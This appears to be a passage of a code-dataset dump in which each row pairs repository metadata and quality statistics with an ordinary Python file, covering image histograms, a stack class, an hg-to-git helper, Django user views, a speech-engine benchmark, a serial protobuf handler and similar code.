end_block(True) | 16.622642 | 83 | 0.594779 | 134 | 881 | 3.761194 | 0.455224 | 0.063492 | 0.095238 | 0.10119 | 0.130952 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04321 | 0.264472 | 881 | 53 | 84 | 16.622642 | 0.734568 | 0.043133 | 0 | 0.25 | 0 | 0 | 0.095012 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.027778 | null | null | 0.277778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5e672aa538e6785d26c19832f02db4cd318b24e | 471 | py | Python | CSE-6239-assignment-1/code/sobel.py | shahidul56/computer-vision-resource | fd9f2a328e015bc0bf083578496e980681204614 | [
"MIT"
] | null | null | null | CSE-6239-assignment-1/code/sobel.py | shahidul56/computer-vision-resource | fd9f2a328e015bc0bf083578496e980681204614 | [
"MIT"
] | null | null | null | CSE-6239-assignment-1/code/sobel.py | shahidul56/computer-vision-resource | fd9f2a328e015bc0bf083578496e980681204614 | [
"MIT"
] | null | null | null | # Some imports
from matplotlib import pyplot as plt
import cv2
# for display
from skimage import data # for loading example data
from skimage.color import rgb2gray # for converting to grayscale
# Load image, convert to grayscale and show it
image = rgb2gray(data.astronaut())
def draw_image_histogram(image, channels, color='k'):
hist = cv2.calcHist([image], channels, None, [256], [0, 256])
plt.plot(hist, color=color)
plt.xlim([0, 256])
| 29.4375 | 66 | 0.704883 | 67 | 471 | 4.925373 | 0.58209 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039578 | 0.195329 | 471 | 15 | 67 | 31.4 | 0.831135 | 0.259023 | 0 | 0 | 0 | 0 | 0.003049 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.444444 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
e5e752f6a18aedce35c0b66c9dcf5c5d4d5eb6e8 | 677 | py | Python | stack_reverse_string.py | kromagg/Python | 1ade4c3ac8f0ef24735c22437d3716cc7388f6a1 | [
"MIT"
] | null | null | null | stack_reverse_string.py | kromagg/Python | 1ade4c3ac8f0ef24735c22437d3716cc7388f6a1 | [
"MIT"
] | null | null | null | stack_reverse_string.py | kromagg/Python | 1ade4c3ac8f0ef24735c22437d3716cc7388f6a1 | [
"MIT"
] | null | null | null | class Stack:
def __init__(self):
self.items = []
def is_empty(self):
# return len(self.items) == 0
return not self.items
def push(self, item):
self.items.append(item)
def pop(self):
return self.items.pop()
def peek(self):
return self.items[-1]
def size(self):
return len(self.items)
def __str__(self):
return str(self.items)
if __name__ == "__main__":
string = ".koob doog a htiw nohtyP nraeL"
reversed_string = ""
s = Stack()
for char in string:
s.push(char)
while not s.is_empty():
reversed_string += s.pop()
print(reversed_string) | 18.297297 | 45 | 0.568685 | 89 | 677 | 4.089888 | 0.41573 | 0.197802 | 0.098901 | 0.093407 | 0.120879 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004283 | 0.310192 | 677 | 37 | 46 | 18.297297 | 0.775161 | 0.039882 | 0 | 0 | 0 | 0 | 0.058552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.291667 | false | 0 | 0 | 0.208333 | 0.541667 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
e5e7f6b3dfe5867d1dd051b77e4c526e95d5eaf6 | 5,100 | py | Python | hg2git.py | LukasPersonal/hg-fast-export | 77a770c2b856a49f0d58a035cd9e300c8c0203ac | [
"MIT"
] | null | null | null | hg2git.py | LukasPersonal/hg-fast-export | 77a770c2b856a49f0d58a035cd9e300c8c0203ac | [
"MIT"
] | 1 | 2021-09-30T17:11:13.000Z | 2021-09-30T17:11:13.000Z | hg2git.py | LukasPersonal/hg-fast-export | 77a770c2b856a49f0d58a035cd9e300c8c0203ac | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# pylint: disable=E1101.E0602
# Copyright (c) 2007, 2008 Rocco Rutte <pdmef@gmx.net> and others.
# License: MIT <http://www.opensource.org/licenses/mit-license.php>
import os
import re
import subprocess
import sys
from mercurial import error as hgerror
from mercurial import hg, templatefilters, ui
from mercurial.scmutil import binnode, revsymbol
PY2 = sys.version_info.major < 3
if PY2:
str = unicode # noqa: F821
fsencode = lambda s: s.encode(sys.getfilesystemencoding()) # noqa: E731
else:
from os import fsencode
# default git branch name
cfg_master = b"master"
# default origin name
origin_name = b""
# silly regex to see if user field has email address
user_re = re.compile(b"([^<]+) (<[^>]*>)$")
# silly regex to clean out user names
user_clean_re = re.compile(b'^["]([^"]+)["]$')
def set_default_branch(name):
global cfg_master
cfg_master = name.encode("utf8") if not isinstance(name, bytes) else name
def set_origin_name(name):
global origin_name
origin_name = name
def setup_repo(url):
try:
myui = ui.ui(interactive=False)
except TypeError:
myui = ui.ui()
myui.setconfig(b"ui", b"interactive", b"off")
# Avoids a warning when the repository has obsolete markers
myui.setconfig(b"experimental", b"evolution.createmarkers", True)
return myui, hg.repository(myui, fsencode(url)).unfiltered()
def fixup_user(user, authors):
user = user.strip(b'"')
if authors is not None:
# if we have an authors table, try to get mapping
# by defaulting to the current value of 'user'
user = authors.get(user, user)
name, mail, m = b"", b"", user_re.match(user)
if m is None:
# if we don't have 'Name <mail>' syntax, extract name
# and mail from hg helpers. this seems to work pretty well.
# if email doesn't contain @, replace it with devnull@localhost
name = templatefilters.person(user)
mail = b"<%s>" % templatefilters.email(user)
if b"@" not in mail:
mail = b"<devnull@localhost>"
else:
# if we have 'Name <mail>' syntax, everything is fine :)
name, mail = m.group(1), m.group(2)
# remove any silly quoting from username
m2 = user_clean_re.match(name)
if m2 is not None:
name = m2.group(1)
return b"%s %s" % (name, mail)
def get_branch(name):
# 'HEAD' is the result of a bug in mutt's cvs->hg conversion,
# other CVS imports may need it, too
if name == b"HEAD" or name == b"default" or name == b"":
name = cfg_master
if origin_name:
return origin_name + b"/" + name
return name
def get_changeset(ui, repo, revision, authors={}, encoding=""):
# Starting with Mercurial 4.6 lookup no longer accepts raw hashes
# for lookups. Work around it by changing our behaviour depending on
# how it fails
try:
node = repo.lookup(revision)
except (TypeError, hgerror.ProgrammingError):
node = binnode(revsymbol(repo, b"%d" % revision)) # We were given a numeric rev
except hgerror.RepoLookupError:
node = revision # We got a raw hash
(manifest, user, (time, timezone), files, desc, extra) = repo.changelog.read(node)
if encoding:
user = user.decode(encoding).encode("utf8")
desc = desc.decode(encoding).encode("utf8")
tz = b"%+03d%02d" % (-timezone // 3600, ((-timezone % 3600) // 60))
branch = get_branch(extra.get(b"branch", b"master"))
return (
node,
manifest,
fixup_user(user, authors),
(time, tz),
files,
desc,
branch,
extra,
)
def mangle_key(key):
return key
def load_cache(filename, get_key=mangle_key):
cache = {}
if not os.path.exists(filename):
return cache
f = open(filename, "rb")
linecount = 0
for line in f.readlines():
linecount += 1
fields = line.split(b" ")
if fields is None or not len(fields) == 2 or fields[0][0:1] != b":":
sys.stderr.write(
"Invalid file format in [%s], line %d\n" % (filename, linecount)
)
continue
# put key:value in cache, key without ^:
cache[get_key(fields[0][1:])] = fields[1].split(b"\n")[0]
f.close()
return cache
def save_cache(filename, cache):
f = open(filename, "wb")
for key, value in cache.items():
if not isinstance(key, bytes):
key = str(key).encode("utf8")
if not isinstance(value, bytes):
value = str(value).encode("utf8")
f.write(b":%s %s\n" % (key, value))
f.close()
def get_git_sha1(name, type="heads"):
try:
# use git-rev-parse to support packed refs
ref = "refs/%s/%s" % (type, name.decode("utf8"))
line = subprocess.check_output(
["git", "rev-parse", "--verify", "--quiet", ref.encode("utf8")]
)
if line is None or len(line) == 0:
return None
return line[0:40]
except subprocess.CalledProcessError:
return None
| 30.909091 | 88 | 0.612941 | 708 | 5,100 | 4.365819 | 0.372881 | 0.022646 | 0.011647 | 0.012941 | 0.016176 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018533 | 0.259412 | 5,100 | 164 | 89 | 31.097561 | 0.799841 | 0.218627 | 0 | 0.095652 | 0 | 0 | 0.07049 | 0.005811 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.069565 | 0.008696 | 0.252174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5e873bb87ab31b611a9db0a4399b14d3a1da37d | 331 | py | Python | l1-l100/7.py | ZucchiniY/Leetcode-cn | c26d080b7f8115a2edfc135742c1cad0105eccfc | [
"MIT"
] | null | null | null | l1-l100/7.py | ZucchiniY/Leetcode-cn | c26d080b7f8115a2edfc135742c1cad0105eccfc | [
"MIT"
] | null | null | null | l1-l100/7.py | ZucchiniY/Leetcode-cn | c26d080b7f8115a2edfc135742c1cad0105eccfc | [
"MIT"
] | null | null | null | """
最终的结果要考虑 Python 的int 类型会比一般语言的长,所以要考虑 32位这个范围。
"""
class Solution:
def reverse(self, x: int) -> int:
y = x
if x < 0:
y = -1 * x
y = str(y)[::-1]
if x < 0:
r = -1 * int(y)
else:
r = int(y)
return r if -2147483648 < r < 2147483647 else 0
| 18.388889 | 55 | 0.432024 | 45 | 331 | 3.177778 | 0.511111 | 0.083916 | 0.055944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149733 | 0.435045 | 331 | 17 | 56 | 19.470588 | 0.614973 | 0.138973 | 0 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5e8dd52ec7800abc2fea2d0e906bb4110812873 | 382 | py | Python | users/urls.py | Gabriel-limadev/learning_log | c8f0d0e95d19da652c7a56d80df0990d5c3a18d0 | [
"MIT"
] | null | null | null | users/urls.py | Gabriel-limadev/learning_log | c8f0d0e95d19da652c7a56d80df0990d5c3a18d0 | [
"MIT"
] | null | null | null | users/urls.py | Gabriel-limadev/learning_log | c8f0d0e95d19da652c7a56d80df0990d5c3a18d0 | [
"MIT"
] | null | null | null | """Define padrões de URL para users"""
from django.urls import path, include
from django.contrib.auth.views import LoginView
from . import views
urlpatterns = [
# Página de Login
path('login', LoginView.as_view(template_name='users/login.html'), name='login'),
path('logout', views.logout_view, name='logout'),
path('register', views.register, name='register')
]
| 27.285714 | 85 | 0.712042 | 51 | 382 | 5.27451 | 0.509804 | 0.074349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143979 | 382 | 13 | 86 | 29.384615 | 0.82263 | 0.128272 | 0 | 0 | 0 | 0 | 0.165138 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e5ebdbe01f05c949fa7304e210592a5bcd39cded | 5,923 | py | Python | resumecollection/users/v1/views.py | m-ali-ubit/resume-collection | 1e598928fed38f4a3b5972ff473e26e07e4c464a | [
"MIT"
] | null | null | null | resumecollection/users/v1/views.py | m-ali-ubit/resume-collection | 1e598928fed38f4a3b5972ff473e26e07e4c464a | [
"MIT"
] | null | null | null | resumecollection/users/v1/views.py | m-ali-ubit/resume-collection | 1e598928fed38f4a3b5972ff473e26e07e4c464a | [
"MIT"
] | null | null | null | import logging
from django.contrib.auth import get_user_model, authenticate
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import Http404
from django.views.generic import RedirectView
from rest_framework import status, permissions
from rest_framework.exceptions import ValidationError
from rest_framework.generics import get_object_or_404
from rest_framework.response import Response
from rest_framework.reverse import reverse
from rest_framework.views import APIView
from rest_framework.viewsets import ModelViewSet
from resumecollection.users.helpers import UpdatePasswordHelper
from resumecollection.users.v1.serializers import (
UserSerializer,
ForgotPasswordEmailSerializer,
UpdatePasswordRequestSerializer,
LoginRequestSerializer,
)
from resumecollection.utils.authentication import create_login_token
from resumecollection.utils.email import send_password_update_email
from resumecollection.utils.permissions import UpdatePasswordPermission
from resumecollection.utils.response_handler import validation_exception_handler
logger = logging.getLogger(__name__)
User = get_user_model()
class UserModelViewSet(ModelViewSet):
serializer_class = UserSerializer
queryset = User.objects.all()
lookup_field = "username"
class UserRedirectView(LoginRequiredMixin, RedirectView):
def get_redirect_url(self):
return reverse("users:detail", kwargs={"username": self.request.user.username})
class ForgotPasswordAPIView(APIView):
def validate_email(self, query_params):
serializer = ForgotPasswordEmailSerializer(data=query_params)
serializer.is_valid(raise_exception=True)
return serializer.validated_data.get("email")
def get(self, request) -> Response:
try:
user_email_address = self.validate_email(request.query_params)
user = get_object_or_404(User, email=user_email_address)
send_password_update_email(
user, UpdatePasswordHelper.generate_update_password_url(user)
)
except Http404:
logger.error(
f"Failure to find the object, the User with the email "
f"{user_email_address} doesnt exist"
)
return Response(
data=f"The User with the email {user_email_address} doesnt exist.",
status=status.HTTP_400_BAD_REQUEST,
)
except ValidationError as validation_error:
logger.error(
f"Validation error occurred while sending forget password email. "
f"Error: {validation_error}"
)
return Response(
data="The email address is not valid",
status=status.HTTP_400_BAD_REQUEST,
)
logger.info(
f"Email for updating password has been sent to {user_email_address}"
)
return Response(
data="Email has been sent successfully", status=status.HTTP_200_OK
)
class UpdateUserPasswordAPIView(APIView):
permission_classes = [UpdatePasswordPermission]
def get_permissions(self):
if self.request.data.get("is_admin"):
return [permissions.IsAuthenticated()]
return super(UpdateUserPasswordAPIView, self).get_permissions()
def post(self, request) -> Response:
try:
serialized_data = UpdatePasswordRequestSerializer(data=request.data)
serialized_data.is_valid(raise_exception=True)
user = get_object_or_404(User, email=request.data.get("email"))
user.set_password(serialized_data.data["confirm_password"])
user.save()
UpdatePasswordHelper.invalidate_update_password_token(user.email)
return Response(
data="Password has been updated successfully", status=status.HTTP_200_OK
)
except Http404:
logger.error(f"Failure to find the object, user with email doesnt exist")
return Response(
data="The User doesn't exist", status=status.HTTP_400_BAD_REQUEST
)
except ValidationError as validation_error:
logger.error(
f"Validation error occurred while updating the password with {validation_error}"
)
return Response(
data=f"Failed to update the password with {validation_error}",
status=status.HTTP_400_BAD_REQUEST,
)
class LoginUserAPIView(APIView):
permission_classes = [permissions.AllowAny]
def post(self, request):
try:
request_serializer = LoginRequestSerializer(data=request.data)
request_serializer.is_valid(raise_exception=True)
username = request_serializer.validated_data["username"]
password = request_serializer.validated_data["password"]
remember_me = request_serializer.validated_data["remember_me"]
user = authenticate(username=username.lower(), password=password)
if not user:
return Response(
data="Credentials not correct. Unable to Login.",
status=status.HTTP_401_UNAUTHORIZED,
)
token = create_login_token(user, remember_me)
return Response(
data={
"token": token,
"user": UserSerializer(user).data,
"message": "Successfully logged in.",
},
status=status.HTTP_200_OK,
)
except ValidationError as error:
logger.info(
f"Validation failed for User Login with exception {error}"
)
data = validation_exception_handler(error)
data.update({"message": error.default_detail})
return Response(data=data, status=status.HTTP_400_BAD_REQUEST)
| 39.225166 | 96 | 0.667905 | 608 | 5,923 | 6.307566 | 0.241776 | 0.032855 | 0.042243 | 0.024772 | 0.232595 | 0.16219 | 0.097001 | 0.08292 | 0.08292 | 0.08292 | 0 | 0.010538 | 0.263042 | 5,923 | 150 | 97 | 39.486667 | 0.868041 | 0 | 0 | 0.178295 | 0 | 0 | 0.140976 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0.170543 | 0.139535 | 0.007752 | 0.364341 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e5ede57f6e5a4c4f286e2ced6355288e52909591 | 1,947 | py | Python | binding/python/test_cobra_perf.py | Picovoice/cobra | 2684f7e873930b66fa5cd114ee06434a63760160 | [
"Apache-2.0"
] | 26 | 2021-09-17T20:11:52.000Z | 2022-03-13T01:33:22.000Z | binding/python/test_cobra_perf.py | Picovoice/cobra | 2684f7e873930b66fa5cd114ee06434a63760160 | [
"Apache-2.0"
] | 4 | 2021-09-29T20:39:25.000Z | 2022-01-19T18:24:56.000Z | binding/python/test_cobra_perf.py | Picovoice/cobra | 2684f7e873930b66fa5cd114ee06434a63760160 | [
"Apache-2.0"
] | 3 | 2021-11-08T05:19:24.000Z | 2022-03-07T03:08:24.000Z | #
# Copyright 2022 Picovoice Inc.
#
# You may not use this file except in compliance with the license. A copy of the license is located in the "LICENSE"
# file accompanying this source.
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
import sys
import time
import unittest
from cobra import Cobra
from util import *
from test_util import *
class CobraPerformanceTestCase(unittest.TestCase):
ACCESS_KEY = sys.argv[1]
NUM_TEST_ITERATIONS = int(sys.argv[2])
PERFORMANCE_THRESHOLD_SEC = float(sys.argv[3])
def test_performance(self):
cobra = Cobra(access_key=sys.argv[1], library_path=pv_library_path('../..'))
audio = read_wav_file(
os.path.join(os.path.dirname(__file__), '../../res/audio/sample.wav'),
cobra.sample_rate)
num_frames = len(audio) // cobra.frame_length
perf_results = []
for i in range(self.NUM_TEST_ITERATIONS):
proc_time = 0
for j in range(num_frames):
frame = audio[j * cobra.frame_length:(j + 1) * cobra.frame_length]
start = time.time()
cobra.process(frame)
proc_time += time.time() - start
if i > 0:
perf_results.append(proc_time)
cobra.delete()
avg_perf = sum(perf_results) / self.NUM_TEST_ITERATIONS
print("Average performance: %s" % avg_perf)
self.assertLess(avg_perf, self.PERFORMANCE_THRESHOLD_SEC)
if __name__ == '__main__':
if len(sys.argv) != 4:
print("usage: test_cobra_perf.py ${ACCESS_KEY} ${NUM_TEST_INTERVALS} ${PERFORMANCE_THRESHOLD_SEC}")
exit(1)
unittest.main(argv=sys.argv[:1])
| 33 | 117 | 0.663585 | 262 | 1,947 | 4.729008 | 0.465649 | 0.048426 | 0.01937 | 0.025827 | 0.027441 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009434 | 0.237802 | 1,947 | 58 | 118 | 33.568966 | 0.825472 | 0.247047 | 0 | 0 | 0 | 0 | 0.104467 | 0.051546 | 0 | 0 | 0 | 0 | 0.028571 | 1 | 0.028571 | false | 0 | 0.171429 | 0 | 0.314286 | 0.057143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5edfa705d3471d7a0761238dd4b5b4398bf2f00 | 4,034 | py | Python | neurons/boltzmann/main.py | unconst/SimpleWord2Vec | d1af6993c1d6bca273a0c8d147132ee9867f5543 | [
"MIT"
] | 9 | 2019-12-18T10:20:15.000Z | 2021-03-18T00:07:28.000Z | neurons/boltzmann/main.py | unconst/SimpleWord2Vec | d1af6993c1d6bca273a0c8d147132ee9867f5543 | [
"MIT"
] | 5 | 2020-02-12T02:21:15.000Z | 2022-02-10T00:25:28.000Z | neurons/boltzmann/main.py | unconst/BitTensor | d1af6993c1d6bca273a0c8d147132ee9867f5543 | [
"MIT"
] | null | null | null | import bittensor
from config import Config
from metagraph import Metagraph
from dendrite import Dendrite
from nucleus import Nucleus
from neuron import Neuron
from Crypto.Hash import SHA256
from datetime import timedelta
import grpc
from loguru import logger
import pickle
import numpy as np
import random
import time
from timeloop import Timeloop
def set_timed_loops(tl, config, neuron, metagraph):
# Test self.
# @tl.job(interval=timedelta(seconds=1))
# def test():
# channel = grpc.insecure_channel(config.serve_address + ":" + config.port)
#
# for _ in range(100):
# # Inc message id.
# message_id = random.randint(0, 1000000)
#
# # Make request.
# spikes = np.array([['apples']])
# stub = bittensor.proto.bittensor_pb2_grpc.BittensorStub(channel)
#
# time_str = str(time.time())
# # Build hash.
# hash = SHA256.new()
# hash.update(config.identity.encode())
# hash.update(spikes.tobytes())
# hash.update(time_str.encode())
# message_hash = hash.digest()
#
# # Build request.
# request = bittensor.proto.bittensor_pb2.SpikeRequest()
# request.parent_id = config.identity
# request.message_id = message_hash
# request.payload = pickle.dumps(spikes, protocol=0)
#
# # Send Spike.
# try:
# response = stub.Spike(request)
# response = pickle.loads(response.payload).reshape(1, 128)
#
# except Exception as e:
# logger.error(str(e))
#
# # Make grad request.
# grad = np.zeros((1, 128))
# stub = bittensor.proto.bittensor_pb2_grpc.BittensorStub(channel)
#
# # Build hash.
# hash = SHA256.new()
# hash.update(config.identity.encode())
# hash.update(spikes.tobytes())
# hash.update(time_str.encode())
# message_hash = hash.digest()
#
# request = bittensor.proto.bittensor_pb2.GradeRequest()
# request.parent_id = config.identity
# request.message_id = message_hash
# request.payload = pickle.dumps(grad, protocol=0)
#
# # Send grade request.
# try:
# stub.Grade(request)
# except Exception as e:
# logger.error(str(e))
# Pull the updated graph state (Vertices, Edges, Weights)
@tl.job(interval=timedelta(seconds=7))
def pull_metagraph():
metagraph.pull_metagraph()
# Reselect channels.
@tl.job(interval=timedelta(seconds=10))
def connect():
neuron.connect()
# Apply a gradient step.
@tl.job(interval=timedelta(seconds=3))
def learn():
neuron.Learn()
def main():
config = Config()
metagraph = Metagraph(config)
dendrite = Dendrite(config, metagraph)
nucleus = Nucleus(config)
neuron = Neuron(config, dendrite, nucleus, metagraph)
neuron.serve()
# Start timed calls.
tl = Timeloop()
set_timed_loops(tl, config, neuron, metagraph)
tl.start(block=False)
logger.info('Started Timers.')
def tear_down(_config, _neuron, _dendrite, _nucleus, _metagraph):
logger.debug('tear down.')
del _neuron
del _dendrite
del _nucleus
del _metagraph
del _config
try:
logger.info('Begin wait on main...')
while True:
logger.debug('heartbeat')
time.sleep(100)
except KeyboardInterrupt:
logger.debug('Neuron stopped with keyboard interrupt.')
tear_down(config, neuron, dendrite, nucleus, metagraph)
except Exception as e:
logger.error('Neuron stopped with interrupt on error: ' + str(e))
tear_down(config, neuron, dendrite, nucleus, metagraph)
if __name__ == '__main__':
logger.debug("started neuron.")
main()
| 28.609929 | 83 | 0.589737 | 428 | 4,034 | 5.446262 | 0.306075 | 0.030888 | 0.022308 | 0.037752 | 0.424281 | 0.346203 | 0.333762 | 0.246246 | 0.1716 | 0.1716 | 0 | 0.014931 | 0.302677 | 4,034 | 140 | 84 | 28.814286 | 0.813722 | 0.463312 | 0 | 0.035088 | 0 | 0 | 0.074905 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.263158 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5ee0a1b58d18c70bdda71d41120500488aa7c66 | 897 | py | Python | miplearn/tests/__init__.py | GregorCH/MIPLearn | 28e2ba7c0133602fb361f8690bc7424869f68b43 | [
"BSD-3-Clause"
] | null | null | null | miplearn/tests/__init__.py | GregorCH/MIPLearn | 28e2ba7c0133602fb361f8690bc7424869f68b43 | [
"BSD-3-Clause"
] | null | null | null | miplearn/tests/__init__.py | GregorCH/MIPLearn | 28e2ba7c0133602fb361f8690bc7424869f68b43 | [
"BSD-3-Clause"
] | null | null | null | # MIPLearn: Extensible Framework for Learning-Enhanced Mixed-Integer Optimization
# Copyright (C) 2020, UChicago Argonne, LLC. All rights reserved.
# Released under the modified BSD license. See COPYING.md for more details.
from miplearn import LearningSolver
from miplearn.problems.knapsack import KnapsackInstance
def get_test_pyomo_instances():
instances = [
KnapsackInstance(
weights=[23.0, 26.0, 20.0, 18.0],
prices=[505.0, 352.0, 458.0, 220.0],
capacity=67.0,
),
KnapsackInstance(
weights=[25.0, 30.0, 22.0, 18.0],
prices=[500.0, 365.0, 420.0, 150.0],
capacity=70.0,
),
]
models = [instance.to_model() for instance in instances]
solver = LearningSolver()
for i in range(len(instances)):
solver.solve(instances[i], models[i])
return instances, models
| 34.5 | 82 | 0.634337 | 115 | 897 | 4.913043 | 0.626087 | 0.042478 | 0.014159 | 0.035398 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098361 | 0.251951 | 897 | 25 | 83 | 35.88 | 0.743666 | 0.244147 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.1 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5ee4943aac68235054c17ff1e0039fbf33c5e05 | 3,394 | py | Python | RPi/PBUtils.py | lefake/RPi-Arduino-PB-Communication | 8f827a4b8eaa331cd47d9a3f5bfa0414ec8c264f | [
"MIT"
] | null | null | null | RPi/PBUtils.py | lefake/RPi-Arduino-PB-Communication | 8f827a4b8eaa331cd47d9a3f5bfa0414ec8c264f | [
"MIT"
] | null | null | null | RPi/PBUtils.py | lefake/RPi-Arduino-PB-Communication | 8f827a4b8eaa331cd47d9a3f5bfa0414ec8c264f | [
"MIT"
] | null | null | null | from binascii import unhexlify
import threading
import time
# Serialization utils
class PBSerializationHandler:
def __init__(self, msg_obj):
self._msg_obj = msg_obj
def encode_msgs(self, ids, msgs):
msg = "<"
for id_msg, pb_msg in zip(ids, msgs):
msg += str(id_msg) + "|"
for byte in bytearray(pb_msg.SerializeToString()):
msg += str(hex(byte))[2:].zfill(2) # Remove \x and fill with 0 in front to always takes 2 digits
msg += ";"
msg += ">"
return msg
def encode_msg(self, id, msg):
return self.encode_msgs([id], [msg])
def deserialize(self, messages):
messages = messages.decode("ascii")
msg_array = messages[1:-1].split(';') # Remove < > characters and split sub-msgs
object_list = []
for msg in msg_array:
if len(msg) > 0:
msg_id, raw_msg = msg.split("|") # Find the id of the message
msg_id = int(msg_id)
obj = self._msg_obj[msg_id]
obj.ParseFromString(unhexlify(raw_msg))
object_list.append([msg_id, obj])
return object_list
# Serial communication utils
class ArduinoReadHandler(threading.Thread):
def __init__(self, sleeptime, readfunc):
self._sleeptime = sleeptime
self._readfunc = readfunc
threading.Thread.__init__(self)
self._runflag = threading.Event()
self._runflag.clear()
self._run = True
def run(self):
self._runflag.set()
self.worker()
def worker(self):
while self._run:
if self._runflag.is_set():
self._readfunc()
time.sleep(self._sleeptime)
def pause(self):
self._runflag.clear()
def resume(self):
self._runflag.set()
def running(self):
return self._runflag.is_set()
def kill(self):
self._run = False
class PBSerialHandler:
def __init__(self, serial, callback, msg_obj, sleeptime=0.01):
self._serial = serial
self._sleeptime = float(sleeptime)
self._callback = callback
self._interlock = False
self._response = None
self._serialization_handler = PBSerializationHandler(msg_obj)
self._worker = ArduinoReadHandler(self._sleeptime, self.read_callback)
self._worker.start()
def kill(self):
self._worker.kill()
def read_callback(self):
if not self._interlock:
self._interlock = True
try:
input = self._serial.read()
if input == b'<':
buffer = self._serial.read_until(b'>')
self._serial.flush()
self._response = b'<' + buffer
self._callback(self._response)
except Exception as e:
print("Read call back error " + str(e))
self._interlock = False
def write_pb_msg(self, id, msg):
self.write_pb_msgs([id], [msg])
def write_pb_msgs(self, ids, msgs):
encoded_msg = self._serialization_handler.encode_msgs(ids, msgs)
while self._interlock:
time.sleep(self._sleeptime)
self._interlock = True
self._serial.write(encoded_msg.encode("ascii"))
self._serial.flush()
self._interlock = False
